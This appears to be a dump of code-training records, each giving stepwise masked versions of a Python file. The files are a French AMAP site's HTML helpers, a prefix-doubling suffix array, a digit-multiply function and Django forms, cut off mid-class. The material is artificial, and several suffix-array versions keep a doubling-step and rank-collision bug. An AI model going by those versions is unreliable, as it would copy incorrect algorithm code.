fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-bicycle fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n\t\t 
\t\tLes clubs</a>\n\t\t \t</li>\n\t\t \t<li><a href=\"/IENAC15/amapatate/python/connecter.py\">\n\t\t \t\t<span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-user fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n\t\t \tSe connecter</a>\n\t\t \t</li>\n\t\t \t'''\n if \"nom\" in Session() and Session()[\"nom\"]!='':\n nav+='''\n <li><a href=\"/IENAC15/amapatate/python/page_prive.py\">\n\t\t \t\t<span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-user fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n\t\t \tPage privée</a>\n\t\t \t</li>\n\t\t \t'''\n nav+='''\n \t\t\t</ul>\n </nav>\n '''\n return nav\n\ndef titre(intitule):\n titre='''\n <header>\n <h1>'''+intitule+'''</h1>\n <p>L'AMAP fruits et légumes qui vous donne la patate </p>\n </header>\n '''\n return titre\n\ndef footer():\n footer='''\n <footer>© All right reserved ENAC\n </footer>\n </body>\n </html>\n '''\n return footer\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def prefix_doubling_suffix_array(n):
    """Build the suffix array of string *n* by prefix doubling.

    Returns the list of suffix start indices in lexicographic order of the
    suffixes, e.g. 'banana' -> [5, 3, 1, 0, 4, 2].

    Runs in O(n log^2 n): O(log n) doubling rounds, each dominated by an
    O(n log n) sort of (current_rank, next_rank) pairs.
    """
    n_len = len(n)
    # Trivial cases: empty string and single character.
    if n_len == 0:
        return []
    if n_len == 1:
        return [0]
    # Each entry is (start_index, info); info tracks the suffix text plus the
    # current/next ranks used for pair sorting.
    suffixes = []
    for i in range(n_len):
        info = {'suffix': n[i:]}
        info['current_rank'] = ord(info['suffix'][0])
        # Rank of the second character, or -1 when the suffix has length 1
        # (-1 makes a shorter suffix sort before any longer extension of it).
        info['next_rank'] = ord(info['suffix'][1]) if len(info['suffix']) > 1 else -1
        suffixes.append((i, info))
    # After this sort the suffixes are ordered by their first two characters.
    suffixes.sort(key=lambda x: (x[1]['current_rank'], x[1]['next_rank']))
    # Bug fix: the original `for k in range(4, 2 * n_len, 2 * k)` evaluated its
    # step once (8), so k advanced 4, 12, 20, ... instead of doubling.  Prefix
    # doubling needs k = 4, 8, 16, ... so each round extends the sorted prefix
    # length from k/2 to k.
    k = 4
    while k < 2 * n_len:
        # Re-rank: equal (current_rank, next_rank) pairs share a rank,
        # otherwise the rank increments in sorted order.  Bug fix: pairs are
        # compared as tuples; the original concatenated their decimal digits
        # without a separator, conflating e.g. (1, 13) with (11, 3).
        prev_rank_pair = (suffixes[0][1]['current_rank'], suffixes[0][1]['next_rank'])
        suffixes[0][1]['current_rank'] = 0
        # Map suffix text -> its new rank so next_rank lookups are O(1).
        curr_rank_ht = {suffixes[0][1]['suffix']: 0}
        for i in range(1, len(suffixes)):
            rank_pair = (suffixes[i][1]['current_rank'], suffixes[i][1]['next_rank'])
            if rank_pair == prev_rank_pair:
                suffixes[i][1]['current_rank'] = suffixes[i - 1][1]['current_rank']
            else:
                suffixes[i][1]['current_rank'] = suffixes[i - 1][1]['current_rank'] + 1
            prev_rank_pair = rank_pair
            curr_rank_ht[suffixes[i][1]['suffix']] = suffixes[i][1]['current_rank']
        # next_rank becomes the rank of the suffix starting k/2 positions
        # later (suffix[i + k/2]), or -1 when that runs past the end.
        for i in range(len(suffixes)):
            sub_suffix = suffixes[i][1]['suffix'][k // 2:]
            suffixes[i][1]['next_rank'] = curr_rank_ht.get(sub_suffix, -1)
        suffixes.sort(key=lambda x: (x[1]['current_rank'], x[1]['next_rank']))
        k *= 2
    return [i for i, _ in suffixes]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def prefix_doubling_suffix_array(n):
    """Build the suffix array of string *n* using prefix doubling.

    Returns the start indices of the suffixes of *n*, ordered by the
    lexicographic order of the suffixes themselves.
    """
    n_len = len(n)
    # Trivial cases: empty string and single character.
    if n_len == 0:
        return []
    if n_len == 1:
        return [0]
    # Each entry is (start_index, info): info holds the suffix text plus the
    # current/next ranks used for pair sorting.
    suffixes = []
    for i in range(n_len):
        suffixes.append((i, {}))
        suffixes[i][1]['suffix'] = n[i:]
        # Initial rank: code point of the first character.
        suffixes[i][1]['current_rank'] = ord(suffixes[i][1]['suffix'][0])
        if len(suffixes[i][1]['suffix']) > 1:
            suffixes[i][1]['next_rank'] = ord(suffixes[i][1]['suffix'][1])
        else:
            # -1 makes a length-1 suffix sort before any longer extension.
            suffixes[i][1]['next_rank'] = -1
    # After this sort the suffixes are ordered by their first two characters.
    suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[1][
        'next_rank']))
    k = 4
    # NOTE(review): the step `2 * k` is evaluated once (k == 4), so k advances
    # 4, 12, 20, ... rather than doubling 4, 8, 16, ... — textbook prefix
    # doubling uses k *= 2; confirm this still converges for intended inputs.
    for k in range(4, 2 * n_len, 2 * k):
        # NOTE(review): concatenating rank digits without a separator can
        # conflate distinct pairs (e.g. (1, 13) and (11, 3) both -> "113").
        prev_rank_pair = str(suffixes[0][1]['current_rank']) + str(suffixes
            [0][1]['next_rank'])
        suffixes[0][1]['current_rank'] = 0
        # Map suffix text -> freshly assigned rank for O(1) next_rank lookups.
        curr_rank_ht = {}
        curr_rank_ht[suffixes[0][1]['suffix']] = 0
        for i in range(1, len(suffixes)):
            current_rank_pair = str(suffixes[i][1]['current_rank']) + str(
                suffixes[i][1]['next_rank'])
            # Equal pairs share the previous suffix's rank; otherwise increment.
            if current_rank_pair == prev_rank_pair:
                suffixes[i][1]['current_rank'] = suffixes[i - 1][1][
                    'current_rank']
            else:
                suffixes[i][1]['current_rank'] = suffixes[i - 1][1][
                    'current_rank'] + 1
            prev_rank_pair = current_rank_pair
            curr_rank_ht[suffixes[i][1]['suffix']] = suffixes[i][1][
                'current_rank']
        for i in range(len(suffixes)):
            # next_rank is the rank of the suffix starting k/2 positions later,
            # or -1 when that position runs past the end of the string.
            sub_suffix = suffixes[i][1]['suffix'][k // 2:]
            if sub_suffix in curr_rank_ht:
                suffixes[i][1]['next_rank'] = curr_rank_ht[sub_suffix]
            else:
                suffixes[i][1]['next_rank'] = -1
        suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[
            1]['next_rank']))
    # Emit the start indices in their final sorted order.
    suffix_array = []
    for i in suffixes:
        suffix_array.append(i[0])
    return suffix_array
<|reserved_special_token_0|>
print(suffix_array)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def prefix_doubling_suffix_array(n):
    """Return the suffix array of *n*: the suffix start indices, sorted by
    the lexicographic order of the suffixes (prefix-doubling construction)."""
    length = len(n)
    if length == 0:
        return []
    if length == 1:
        return [0]

    # Build (start, meta) records; meta carries the suffix text and the
    # rank pair used for sorting.
    records = []
    for start in range(length):
        text = n[start:]
        meta = {
            'suffix': text,
            'current_rank': ord(text[0]),
            'next_rank': ord(text[1]) if len(text) > 1 else -1,
        }
        records.append((start, meta))

    def pair_key(record):
        return (record[1]['current_rank'], record[1]['next_rank'])

    # Initial pass: order by the first two characters.
    records = sorted(records, key=pair_key)

    k = 4
    for k in range(4, 2 * length, 2 * k):
        # Re-rank in sorted order: identical rank pairs share a rank.
        first = records[0][1]
        previous = str(first['current_rank']) + str(first['next_rank'])
        first['current_rank'] = 0
        rank_of = {first['suffix']: 0}
        for idx in range(1, len(records)):
            meta = records[idx][1]
            combined = str(meta['current_rank']) + str(meta['next_rank'])
            if combined == previous:
                meta['current_rank'] = records[idx - 1][1]['current_rank']
            else:
                meta['current_rank'] = records[idx - 1][1]['current_rank'] + 1
            previous = combined
            rank_of[meta['suffix']] = meta['current_rank']
        # next_rank: rank of the suffix k/2 positions further on, or -1.
        for idx in range(len(records)):
            meta = records[idx][1]
            tail = meta['suffix'][k // 2:]
            meta['next_rank'] = rank_of.get(tail, -1)
        records = sorted(records, key=pair_key)

    return [start for start, _ in records]
# Demo: print the suffix array of "banana"
# (suffix start indices ordered a < ana < anana < banana < na < nana).
n = 'banana'
suffix_array = prefix_doubling_suffix_array(n)
print(suffix_array)
<|reserved_special_token_1|>
"""
Suffix Arrays - Optimized O(n log n) - prefix doubling
A suffix is a non-empty substring at the end of the string. A suffix array
contains all the sorted suffixes of a string
A suffix array provides a space efficient alternative to a suffix tree which
itself is a compressed version of a trie. Suffix array can do something a suffix
tree can, with some additional information such as Longest Common Prefix (LCP)
array.
A suffix array can be constructed from Suffix tree by doing a DFS traversal of
the suffix tree. In fact Suffix array and suffix tree both can be constructed
from each other in linear time.
Advantages of suffix arrays over suffix trees include improved space
requirements, simpler linear time construction algorithms (e.g., compared to
Ukkonen’s algorithm) and improved cache locality
source: https://www.geeksforgeeks.org/suffix-array-set-2-a-nlognlogn-algorithm/
# Algorithm
1. The first step is to generate all the suffix starting with the whole string
and then looping through and producing the 1 to end, 2 to end etc until the
end character.
2. We assign current and next rank to the first two characters of the suffixes.
A simple rank could be str[i]-'a'. If no characters are found, set it to -1
Index Suffix Rank Next Rank
0 banana 1 0
1 anana 0 13
2 nana 13 0
3 ana 0 13
4 na 13 0
5 a 0 -1
3. Sort the array using the current and next rank
Index Suffix Rank Next Rank
5 a 0 -1
1 anana 0 13
3 ana 0 13
0 banana 1 0
2 nana 13 0
4 na 13 0
4. So far we sorted all the suffixes through first two characters. Now we do the
next 4, 8 and so on until 2*len(n) times. We loop from 4 to 2N and
calculate the current and next rank the following way.
a. Current Rank - Assign 0 as the current rank for the first suffix. For
remaining suffixes, we take the rank pair from previous iteration i.e
(current rank, next rank) from the previous time and see if it's the
same as the rank pair of the previous suffix. If they are the same, set
current rank to same as previous suffix current rank, else increment by
1 and set it as current rank for the current suffix.
Index Suffix Rank
5 a 0 [Assign 0 to first]
1 anana 1 (0, 13) is different from previous
3 ana 1 (0, 13) is same as previous
0 banana 2 (1, 0) is different from previous
2 nana 3 (13, 0) is different from previous
4 na 3 (13, 0) is same as previous
b. Next Rank - suppose k is the loop and the initial value is 4, we take
the subarray from k/2 to end and see what current rank is assigned for
that suffix (i.e. suffix[k/2:].current_rank) and set that rank. If no
      suffix is found or there are no characters from k/2 to the end, set it to -1
Index Suffix Rank Next Rank
5 a 0 -1
1 anana 1 1
3 ana 1 0
0 banana 2 3
2 nana 3 3
4 na 3 -1
5. Now sort current and next rank
6. Proceed like this until k <= 2N
"""
def prefix_doubling_suffix_array(n):
    """Return the suffix array of string ``n`` using prefix doubling.

    The suffix array is the list of starting indices of all suffixes of
    ``n`` in lexicographically sorted order.

    Each suffix is represented only by its starting index plus a rank
    array -- ``rank[i]`` is the sort rank of suffix ``i`` considering its
    first ``k`` characters -- instead of materialising every suffix
    string (which costs O(n^2) memory).  Each round sorts suffixes by
    the pair ``(rank[i], rank[i + k])``, i.e. by their first ``2k``
    characters, then doubles ``k``, so only O(log n) sorting rounds are
    needed (O(n log^2 n) overall with comparison sorting).

    This fixes two defects in the previous version:
    * ``range(4, 2 * n_len, 2 * k)`` evaluated the step once (8), so k
      went 4, 12, 20, ... instead of doubling, breaking the invariant
      that each round extends the sorted prefix contiguously.
    * rank pairs were compared via string concatenation
      (``str(cr) + str(nr)``), which collides, e.g. (1, 13) and (11, 3)
      both produce "113".

    Args:
        n: the input string (may be empty).

    Returns:
        A list of starting indices of the sorted suffixes.
    """
    n_len = len(n)

    # Base cases: nothing (or only one suffix) to sort.
    if n_len == 0:
        return []
    if n_len == 1:
        return [0]

    # Initial ranks: the code point of the first character orders the
    # suffixes by their first character.
    rank = [ord(ch) for ch in n]
    suffix_array = list(range(n_len))

    k = 1
    while k < n_len:
        # Sort key for suffix i over its first 2k characters: the rank
        # of its first k characters, then the rank of the following k
        # characters.  -1 when the suffix is shorter than k + 1
        # characters, so shorter suffixes sort first, matching plain
        # string comparison of a prefix against its extension.
        def sort_key(i):
            return (rank[i], rank[i + k] if i + k < n_len else -1)

        suffix_array.sort(key=sort_key)

        # Re-rank in sorted order: suffixes with equal 2k-character keys
        # share a rank; otherwise the rank increases by one.
        new_rank = [0] * n_len
        for pos in range(1, n_len):
            prev, curr = suffix_array[pos - 1], suffix_array[pos]
            new_rank[curr] = new_rank[prev] + (sort_key(curr) != sort_key(prev))
        rank = new_rank

        # Double the prefix length handled so far (4, 8, 16, ...).
        k *= 2

    return suffix_array
# Demo: build and display the suffix array of "banana".
# Guarded so that importing this module does not run the demo as a
# side effect; running the file directly behaves exactly as before.
if __name__ == "__main__":
    n = "banana"
    suffix_array = prefix_doubling_suffix_array(n)
    print(suffix_array)  # expected: [5, 3, 1, 0, 4, 2]
|
flexible
|
{
"blob_id": "5a2106f5255493d2f6c8cb9e06a2666c8c55ed38",
"index": 3852,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef prefix_doubling_suffix_array(n):\n n_len = len(n)\n if n_len == 0:\n return []\n if n_len == 1:\n return [0]\n suffixes = []\n for i in range(n_len):\n suffixes.append((i, {}))\n suffixes[i][1]['suffix'] = n[i:]\n suffixes[i][1]['current_rank'] = ord(suffixes[i][1]['suffix'][0])\n if len(suffixes[i][1]['suffix']) > 1:\n suffixes[i][1]['next_rank'] = ord(suffixes[i][1]['suffix'][1])\n else:\n suffixes[i][1]['next_rank'] = -1\n suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[1][\n 'next_rank']))\n k = 4\n for k in range(4, 2 * n_len, 2 * k):\n prev_rank_pair = str(suffixes[0][1]['current_rank']) + str(suffixes\n [0][1]['next_rank'])\n suffixes[0][1]['current_rank'] = 0\n curr_rank_ht = {}\n curr_rank_ht[suffixes[0][1]['suffix']] = 0\n for i in range(1, len(suffixes)):\n current_rank_pair = str(suffixes[i][1]['current_rank']) + str(\n suffixes[i][1]['next_rank'])\n if current_rank_pair == prev_rank_pair:\n suffixes[i][1]['current_rank'] = suffixes[i - 1][1][\n 'current_rank']\n else:\n suffixes[i][1]['current_rank'] = suffixes[i - 1][1][\n 'current_rank'] + 1\n prev_rank_pair = current_rank_pair\n curr_rank_ht[suffixes[i][1]['suffix']] = suffixes[i][1][\n 'current_rank']\n for i in range(len(suffixes)):\n sub_suffix = suffixes[i][1]['suffix'][k // 2:]\n if sub_suffix in curr_rank_ht:\n suffixes[i][1]['next_rank'] = curr_rank_ht[sub_suffix]\n else:\n suffixes[i][1]['next_rank'] = -1\n suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[\n 1]['next_rank']))\n suffix_array = []\n for i in suffixes:\n suffix_array.append(i[0])\n return suffix_array\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef prefix_doubling_suffix_array(n):\n n_len = len(n)\n if n_len == 0:\n return []\n if n_len == 1:\n return [0]\n suffixes = []\n for i in range(n_len):\n suffixes.append((i, {}))\n suffixes[i][1]['suffix'] = n[i:]\n suffixes[i][1]['current_rank'] = ord(suffixes[i][1]['suffix'][0])\n if len(suffixes[i][1]['suffix']) > 1:\n suffixes[i][1]['next_rank'] = ord(suffixes[i][1]['suffix'][1])\n else:\n suffixes[i][1]['next_rank'] = -1\n suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[1][\n 'next_rank']))\n k = 4\n for k in range(4, 2 * n_len, 2 * k):\n prev_rank_pair = str(suffixes[0][1]['current_rank']) + str(suffixes\n [0][1]['next_rank'])\n suffixes[0][1]['current_rank'] = 0\n curr_rank_ht = {}\n curr_rank_ht[suffixes[0][1]['suffix']] = 0\n for i in range(1, len(suffixes)):\n current_rank_pair = str(suffixes[i][1]['current_rank']) + str(\n suffixes[i][1]['next_rank'])\n if current_rank_pair == prev_rank_pair:\n suffixes[i][1]['current_rank'] = suffixes[i - 1][1][\n 'current_rank']\n else:\n suffixes[i][1]['current_rank'] = suffixes[i - 1][1][\n 'current_rank'] + 1\n prev_rank_pair = current_rank_pair\n curr_rank_ht[suffixes[i][1]['suffix']] = suffixes[i][1][\n 'current_rank']\n for i in range(len(suffixes)):\n sub_suffix = suffixes[i][1]['suffix'][k // 2:]\n if sub_suffix in curr_rank_ht:\n suffixes[i][1]['next_rank'] = curr_rank_ht[sub_suffix]\n else:\n suffixes[i][1]['next_rank'] = -1\n suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[\n 1]['next_rank']))\n suffix_array = []\n for i in suffixes:\n suffix_array.append(i[0])\n return suffix_array\n\n\n<mask token>\nprint(suffix_array)\n",
"step-4": "<mask token>\n\n\ndef prefix_doubling_suffix_array(n):\n n_len = len(n)\n if n_len == 0:\n return []\n if n_len == 1:\n return [0]\n suffixes = []\n for i in range(n_len):\n suffixes.append((i, {}))\n suffixes[i][1]['suffix'] = n[i:]\n suffixes[i][1]['current_rank'] = ord(suffixes[i][1]['suffix'][0])\n if len(suffixes[i][1]['suffix']) > 1:\n suffixes[i][1]['next_rank'] = ord(suffixes[i][1]['suffix'][1])\n else:\n suffixes[i][1]['next_rank'] = -1\n suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[1][\n 'next_rank']))\n k = 4\n for k in range(4, 2 * n_len, 2 * k):\n prev_rank_pair = str(suffixes[0][1]['current_rank']) + str(suffixes\n [0][1]['next_rank'])\n suffixes[0][1]['current_rank'] = 0\n curr_rank_ht = {}\n curr_rank_ht[suffixes[0][1]['suffix']] = 0\n for i in range(1, len(suffixes)):\n current_rank_pair = str(suffixes[i][1]['current_rank']) + str(\n suffixes[i][1]['next_rank'])\n if current_rank_pair == prev_rank_pair:\n suffixes[i][1]['current_rank'] = suffixes[i - 1][1][\n 'current_rank']\n else:\n suffixes[i][1]['current_rank'] = suffixes[i - 1][1][\n 'current_rank'] + 1\n prev_rank_pair = current_rank_pair\n curr_rank_ht[suffixes[i][1]['suffix']] = suffixes[i][1][\n 'current_rank']\n for i in range(len(suffixes)):\n sub_suffix = suffixes[i][1]['suffix'][k // 2:]\n if sub_suffix in curr_rank_ht:\n suffixes[i][1]['next_rank'] = curr_rank_ht[sub_suffix]\n else:\n suffixes[i][1]['next_rank'] = -1\n suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[\n 1]['next_rank']))\n suffix_array = []\n for i in suffixes:\n suffix_array.append(i[0])\n return suffix_array\n\n\nn = 'banana'\nsuffix_array = prefix_doubling_suffix_array(n)\nprint(suffix_array)\n",
"step-5": "\"\"\"\nSuffix Arrays - Optimized O(n log n) - prefix doubling\n\nA suffix is a non-empty substring at the end of the string. A suffix array\ncontains all the sorted suffixes of a string\n\nA suffix array provides a space efficient alternative to a suffix tree which\nitself is a compressed version of a trie. Suffix array can do something a suffix\ntree can, with some additional information such as Longest Common Prefix (LCP)\narray. \n\nA suffix array can be constructed from Suffix tree by doing a DFS traversal of\nthe suffix tree. In fact Suffix array and suffix tree both can be constructed\nfrom each other in linear time.\n\nAdvantages of suffix arrays over suffix trees include improved space\nrequirements, simpler linear time construction algorithms (e.g., compared to\nUkkonen’s algorithm) and improved cache locality \n\nsource: https://www.geeksforgeeks.org/suffix-array-set-2-a-nlognlogn-algorithm/\n\n# Algorithm\n1. The first step is to generate all the suffix starting with the whole string\n and then looping through and producing the 1 to end, 2 to end etc until the\n end character.\n2. We assign current and next rank to the first two characters of the suffixes.\n A simple rank could be str[i]-'a'. If no characters are found, set it to -1\n Index Suffix Rank Next Rank \n 0 banana 1 0\n 1 anana 0 13 \n 2 nana 13 0\n 3 ana 0 13\n 4 na 13 0 \n 5 a 0 -1 \n3. Sort the array using the current and next rank\n\t\tIndex Suffix Rank Next Rank \n 5 a 0 -1\n 1 anana 0 13 \n 3 ana 0 13\n 0 banana 1 0\n 2 nana 13 0\n 4 na 13 0 \n\t\n4. So far we sorted all the suffixes through first two characters. Now we do the\n next 4, 8 and so on until 2*len(n) times. We loop from 4 to 2N and\n calculate the current and next rank the following way.\n\n a. Current Rank - Assign 0 as the current rank for the first suffix. 
For\n remaining suffixes, we take the rank pair from previous iteration i.e\n (current rank, next rank) from the previous time and see if it's the\n same as the rank pair of the previous suffix. If they are the same, set\n current rank to same as previous suffix current rank, else increment by\n 1 and set it as current rank for the current suffix.\n \n Index Suffix Rank \n 5 a 0 [Assign 0 to first] \n 1 anana 1 (0, 13) is different from previous\n 3 ana 1 (0, 13) is same as previous \n 0 banana 2 (1, 0) is different from previous \n 2 nana 3 (13, 0) is different from previous \n 4 na 3 (13, 0) is same as previous \n\n\n b. Next Rank - suppose k is the loop and the initial value is 4, we take\n the subarray from k/2 to end and see what current rank is assigned for\n that suffix (i.e. suffix[k/2:].current_rank) and set that rank. If no\n suffix is found or theres no characters for k/2 to end, set it to -1\n\n Index Suffix Rank Next Rank\n 5 a 0 -1\n 1 anana 1 1 \n 3 ana 1 0 \n 0 banana 2 3\n 2 nana 3 3 \n 4 na 3 -1 \n\n5. Now sort current and next rank\n\n6. 
Proceed like this until k <= 2N\n\"\"\"\n\ndef prefix_doubling_suffix_array(n):\n n_len = len(n)\n\n # base cases\n if n_len == 0:\n return []\n if n_len == 1:\n return [0]\n\n # declare suffixes dictionary which will hold all the suffixes in the sorted\n # order eventually and also a current and next rank attribute to help with\n # sorting \n # suffixes = {\n # 0: {\n # \"suffix\": \"banana\",\n # \"current_rank\": None,\n # \"next_rank\": None\n # },\n # 1: {..}\n # }\n suffixes = []\n\n # generate all suffixes for n and set current rank for first character and\n # next rank for second character\n for i in range(n_len):\n suffixes.append((i, {}))\n suffixes[i][1][\"suffix\"] = n[i:]\n suffixes[i][1][\"current_rank\"] = ord(suffixes[i][1][\"suffix\"][0])\n if len(suffixes[i][1][\"suffix\"]) > 1:\n suffixes[i][1][\"next_rank\"] = ord(suffixes[i][1][\"suffix\"][1])\n else:\n suffixes[i][1][\"next_rank\"] = -1\n\n # sort the suffixes by the first two characters i.e. current and next rank.\n # Leverage the sorted() with custom key to sort the tuples by current/next\n # rank. Sorted returns a list of tuples.\n suffixes = sorted(suffixes, key=lambda x: (x[1][\"current_rank\"], x[1][\"next_rank\"]))\n\n # Now that first two characters are sorted, calculate current/next rank and\n # sort first 4, 8.. 
etc characters until 2*n\n k = 4\n for k in range(4, 2 * n_len, 2 * k):\n # store previous rank pair to use it to set the current rank\n prev_rank_pair = str(suffixes[0][1][\"current_rank\"]) + str(suffixes[0][1][\"next_rank\"])\n # set current rank of first suffix to 0\n suffixes[0][1][\"current_rank\"] = 0\n\n # To make the lookup easier for getting the current rank of a suffix\n # to be able to set it as the next rank, maintain a hash table with\n # suffix as the key and current rank as the value\n curr_rank_ht = {}\n curr_rank_ht[suffixes[0][1][\"suffix\"]] = 0\n\n # Loop through suffix array and set the current rank based on current\n # rank pair/previous rank pair comparison.\n for i in range(1, len(suffixes)):\n current_rank_pair = str(suffixes[i][1][\"current_rank\"]) + str(suffixes[i][1][\"next_rank\"])\n # if current and previous are same rank pairs, set current rank of\n # the current suffix to current rank of previous suffix\n if current_rank_pair == prev_rank_pair:\n suffixes[i][1][\"current_rank\"] = suffixes[i-1][1][\"current_rank\"]\n # else add 1 to the current rank of previous suffix and set it as\n # current rank of current suffix.\n else:\n suffixes[i][1][\"current_rank\"] = suffixes[i-1][1][\"current_rank\"] + 1\n\n # set previous rank pair to the current rank pair for the next\n # iteration check.\n prev_rank_pair = current_rank_pair\n\n curr_rank_ht[suffixes[i][1][\"suffix\"]] = suffixes[i][1][\"current_rank\"]\n\n # Loop through suffix array and set the next rank based on the current\n # rank of suffix[k/2:] and if no such suffix exists set it to -1\n for i in range(len(suffixes)):\n sub_suffix = suffixes[i][1][\"suffix\"][k//2:]\n if sub_suffix in curr_rank_ht:\n suffixes[i][1][\"next_rank\"] = curr_rank_ht[sub_suffix]\n else:\n suffixes[i][1][\"next_rank\"] = -1\n \n\n # Now that we have set both current and next rank, sort the suffix array\n # using those two values\n suffixes = sorted(suffixes, key=lambda x: (x[1][\"current_rank\"], 
x[1][\"next_rank\"]))\n\n suffix_array = []\n for i in suffixes:\n suffix_array.append(i[0])\n # print(i[1][\"suffix\"])\n\n return suffix_array\n\nn = \"banana\"\nsuffix_array = prefix_doubling_suffix_array(n)\nprint(suffix_array)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def mult(a, b):
if a > 9 or b > 9 or a < 1 or b < 1:
print(-1)
else:
print(a * b)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def mult(a, b):
if a > 9 or b > 9 or a < 1 or b < 1:
print(-1)
else:
print(a * b)
mult(a, b)
<|reserved_special_token_1|>
# Read two space-separated integers from standard input.
a, b = map(int, input().split())


def mult(a, b):
    """Print a * b when both operands are in 1..9; otherwise print -1."""
    # Reject any operand outside the single-digit range 1-9.
    if a > 9 or b > 9 or a < 1 or b < 1:
        print(-1)
    else:
        print(a * b)


mult(a, b)
|
flexible
|
{
"blob_id": "991fa5f9c83a1821e62f7baacbc56a4d31982312",
"index": 3681,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef mult(a, b):\n if a > 9 or b > 9 or a < 1 or b < 1:\n print(-1)\n else:\n print(a * b)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef mult(a, b):\n if a > 9 or b > 9 or a < 1 or b < 1:\n print(-1)\n else:\n print(a * b)\n\n\nmult(a, b)\n",
"step-4": "a, b = map(int, input().split())\n\n\ndef mult(a, b):\n if a > 9 or b > 9 or a < 1 or b < 1:\n print(-1)\n else:\n print(a * b)\n\n\nmult(a, b)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class RouteForm(forms.ModelForm):
error_messages = {'duplicate_title':
'Please enter a unique name for the crawl'}
title = forms.CharField(max_length=128, help_text=
'Please enter the name of the Crawl')
views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
start = forms.CharField(widget=forms.HiddenInput())
end = forms.CharField(widget=forms.HiddenInput())
waypts = forms.CharField(widget=forms.HiddenInput())
category = forms.ModelChoiceField(queryset=Category.objects.all())
slug = forms.CharField(widget=forms.HiddenInput(), required=False)
created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget
=forms.HiddenInput())
class Meta:
model = Route
fields = ('category', 'title', 'slug', 'start', 'end', 'waypts',
'created_by')
def clean_title(self):
title = self.cleaned_data['title']
try:
Route.objects.get(title=title)
raise forms.ValidationError(self.error_messages[
'duplicate_title'], code='duplicate_title')
except Route.DoesNotExist:
return title
class UserForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput(attrs={
'placeholder': 'Password'}), label='')
username = forms.CharField(widget=forms.TextInput(attrs={'placeholder':
'Username'}), label='')
email = forms.CharField(widget=forms.TextInput(attrs={'placeholder':
'Email'}), label='', required=False)
class Meta:
model = User
fields = 'username', 'email', 'password'
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = 'picture',
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CategoryForm(forms.ModelForm):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
model = Category
fields = 'name',
class RouteForm(forms.ModelForm):
error_messages = {'duplicate_title':
'Please enter a unique name for the crawl'}
title = forms.CharField(max_length=128, help_text=
'Please enter the name of the Crawl')
views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
start = forms.CharField(widget=forms.HiddenInput())
end = forms.CharField(widget=forms.HiddenInput())
waypts = forms.CharField(widget=forms.HiddenInput())
category = forms.ModelChoiceField(queryset=Category.objects.all())
slug = forms.CharField(widget=forms.HiddenInput(), required=False)
created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget
=forms.HiddenInput())
class Meta:
model = Route
fields = ('category', 'title', 'slug', 'start', 'end', 'waypts',
'created_by')
def clean_title(self):
title = self.cleaned_data['title']
try:
Route.objects.get(title=title)
raise forms.ValidationError(self.error_messages[
'duplicate_title'], code='duplicate_title')
except Route.DoesNotExist:
return title
class UserForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput(attrs={
'placeholder': 'Password'}), label='')
username = forms.CharField(widget=forms.TextInput(attrs={'placeholder':
'Username'}), label='')
email = forms.CharField(widget=forms.TextInput(attrs={'placeholder':
'Email'}), label='', required=False)
class Meta:
model = User
fields = 'username', 'email', 'password'
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = 'picture',
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CategoryForm(forms.ModelForm):
name = forms.CharField(max_length=128, help_text=
'Please enter the category name.')
views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
likes = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
slug = forms.CharField(widget=forms.HiddenInput(), required=False)
class Meta:
model = Category
fields = 'name',
class RouteForm(forms.ModelForm):
error_messages = {'duplicate_title':
'Please enter a unique name for the crawl'}
title = forms.CharField(max_length=128, help_text=
'Please enter the name of the Crawl')
views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
start = forms.CharField(widget=forms.HiddenInput())
end = forms.CharField(widget=forms.HiddenInput())
waypts = forms.CharField(widget=forms.HiddenInput())
category = forms.ModelChoiceField(queryset=Category.objects.all())
slug = forms.CharField(widget=forms.HiddenInput(), required=False)
created_by = forms.ModelChoiceField(queryset=User.objects.all(), widget
=forms.HiddenInput())
